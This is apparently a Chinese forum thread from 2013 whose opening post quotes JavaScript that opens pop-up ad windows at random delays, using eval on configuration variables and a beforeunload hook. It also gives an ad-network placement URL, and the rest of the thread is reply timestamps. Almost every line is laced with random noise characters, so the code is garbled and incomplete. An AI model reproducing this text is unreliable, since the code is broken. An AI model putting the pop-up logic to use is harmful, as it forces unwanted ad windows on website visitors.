0 ]) ~' F4 n5 h7 L: m7 L6 K) t - a: 1,
+ H3 G/ m/ V$ ]* [ - b: 2
1 o% L' E( [0 i( r! x' b/ c - }) : K# B. V/ U5 A
- },
' k4 _: M! Y( X: [3 H* N3 k% p - 300) ! \5 P2 m8 D. K w2 R
- }
& Z6 a+ C6 ^1 m# r; ` - for (var i = 1; i <= 10; i++) {
# n$ H; q6 E# P3 Z - var n = i == 1 ? "": i;
9 X$ V4 C- @7 ?1 ] V: T7 i" c - if (eval("_pt" + n + "b") > Math.random()) {
" _ d5 k3 s1 ~% x( k" d/ U - setTimeout(function() {
! D/ A$ Y! j, Y5 z9 m2 \! W - setTimeout(function() {
# O0 ~2 j6 d- h0 {, o$ V - pop(url, { : c; v( Z! F$ e: P
- a: 1,
& g2 i1 M: l) P0 W+ t7 I) D: \& {/ K - b: 2 9 `. F2 _$ f; b: t4 a7 y
- })
( o9 B7 D8 v+ y) V. t - }, : m' D( w3 f7 Y4 W& w# [
- 300)
. |5 W! a6 S9 F0 j1 n3 V) u - }, + D. P3 `1 _* @
- parseInt(eval("_pt" + n + "a")) * 1000)
- V5 ?& @5 U9 [3 w" { - }
! ?7 P. @) C* I/ e) ^! L - }
0 S: F' M% O' n! C* I - if (_pc2 > Math.random()) { $ Q }8 v3 ?: E% u) r0 |2 L- a3 L c
- a_pop(url)
" B& g: I1 K, N) u- p& K; Q/ W- s - }
, Q/ ?: x. R: W: d1 }! Q$ J1 a - if (_po > Math.random()) { ; J9 n( ]$ c7 y# n
- try {
& q+ ~( r- M2 i' r - func(url)
- N) x6 R; Q! Z1 Y5 @) E2 \* \0 y - } catch(q) {} - Z! f1 z& Q2 _4 m$ b
- } 1 {6 r) K) x) p( d& M9 A
- }
' X$ R/ Y- V, l( ^2 H! K- d- f - };
/ d% V+ [* Q1 N# @ - fstart(aa_url);
- V6 O/ c2 T; [" Q! n! Y4 \% ]- N" Z% m - event(window, 'beforeunload', - \( \; C9 E, K: h. U# b' K* X
- function() {}) 9 z( p$ }4 i; c+ n3 E3 A
- })();
URL从这里产生
1 B W r! E6 C: ~9 [
' Y t4 q5 i: p4 j' Jhttp://play.unionsky.cn/show/?placeid=141830
^# k) Y8 K8 x
) p) H) o& F8 J6 l1 j" I) a& P/ r) |% {+ b5 V
|
|
发表于 2013-12-17 15:03:03
楼主
D:1
发表于 2013-12-17 15:31:30
发表于 2013-12-17 16:34:22
发表于 2013-12-17 19:34:38
